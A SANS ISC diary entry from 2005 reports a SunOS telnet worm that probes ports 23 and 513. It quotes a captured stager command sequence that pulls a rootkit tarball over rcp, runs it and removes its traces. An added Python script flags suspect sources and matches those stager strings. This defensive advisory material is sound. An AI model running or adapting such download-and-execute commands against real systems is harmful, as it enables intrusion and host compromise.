SANS ISC InfoSec Handlers Diary Blog

Yatze telnet worm; InfoCon update; rlogin link to telnet maybe?

Published: 2005-03-26
Last Updated: 2005-03-26 21:30:18 UTC
by donald smith (Version: 1)
SunOS telnet worm on the loose. Watch ports 23, 513 and 514.

Telnet (port 23) is being targeted, and rcp (port 514) is the download port used to grab the worm/autorooter kit.

We have received several reports of what appears to be a telnet negotiation exploit with autorooter or worm-like qualities.

Further reports show that many of the hosts reported for telnet scans are also being reported for rlogin brute-forcing on port 513.

It was reported that the probes for port 23 began on 03/20/2005.

Looking at the port 23 data shows it has been fairly active, but the number of targets had a large increase on 03/23/2005.

I pulled these commands from a user-provided tcpdump file:

mkdir /tmp/.m ; cd /tmp/.m; echo /usr/bin/rcp news@`/usr/bin/uname -m`.tar . >
echo /usr/bin/tar -xvf yatze-SunOS_`/usr/bin/uname -m`.tar >>
echo cd rk \; /bin/sh go >>
echo cd / \; rm -rf /tmp/.m/\* \; rm -rf /tmp/.m >>
/usr/bin/nohup /bin/sh >/dev/null 2>/dev/null &
We have not gotten a copy of the actual worm/autorooter yet.

If you have a copy we would like to analyze it.

Most of the port 23 "violators" I looked at are also showing up for attempting to brute-force guess the password on port 513 (rlogin).
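As an added example (not part of this diary), the following Python correlates constructed connection-log records by source to flag hosts that probe telnet and then hammer rlogin, and matches the stager strings from the captured command sequence against a reassembled telnet session payload; the log layout, the 5-attempt threshold and the sample addresses are assumptions.

```python
from collections import defaultdict
import re

# Constructed sample records: "timestamp src dst dport" (assumed firewall-log layout)
SAMPLE_LOG = """\
2005-03-23T10:00:01 192.0.2.10 198.51.100.5 23
2005-03-23T10:00:02 192.0.2.10 198.51.100.5 513
2005-03-23T10:00:03 192.0.2.10 198.51.100.5 513
2005-03-23T10:00:04 192.0.2.10 198.51.100.5 513
2005-03-23T10:00:05 192.0.2.10 198.51.100.5 513
2005-03-23T10:00:06 192.0.2.10 198.51.100.5 513
2005-03-23T10:01:00 192.0.2.77 198.51.100.5 23
2005-03-23T10:02:00 192.0.2.88 198.51.100.5 80
"""

RLOGIN_THRESHOLD = 5  # assumed: this many rlogin hits from one source counts as brute force


def parse_log(text):
    """Yield (src, dport) pairs from whitespace-separated records; skip malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4 and parts[3].isdigit():
            yield parts[1], int(parts[3])


def flag_sources(text, threshold=RLOGIN_THRESHOLD):
    """Return sources that touched telnet (23) and made >= threshold rlogin (513) attempts."""
    hits = defaultdict(lambda: defaultdict(int))
    for src, dport in parse_log(text):
        hits[src][dport] += 1
    return sorted(src for src, ports in hits.items()
                  if ports[23] > 0 and ports[513] >= threshold)


# Strings taken from the command sequence captured in the diary above.
STAGER_PATTERNS = [re.compile(p) for p in (
    r"mkdir /tmp/\.m", r"/usr/bin/rcp news@", r"yatze-SunOS_", r"nohup /bin/sh")]


def match_stager(payload):
    """Return the stager patterns present in a reassembled telnet session payload."""
    return [p.pattern for p in STAGER_PATTERNS if p.search(payload)]


if __name__ == "__main__":
    print("suspect sources:", flag_sources(SAMPLE_LOG))
    print("stager strings:", match_stager("mkdir /tmp/.m ; cd /tmp/.m; echo /usr/bin/rcp news@"))
```

A host flagged by flag_sources should then be checked for outbound rcp (port 514) traffic, which is the download path the diary describes.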

InfoCon Alert Status Calibration

We have received a lot of emails about our InfoCon Alert Status since yesterday's diary requested your feedback/opinions of it.

We will review them and consider each suggestion.

Please keep submitting your ideas via the contact page.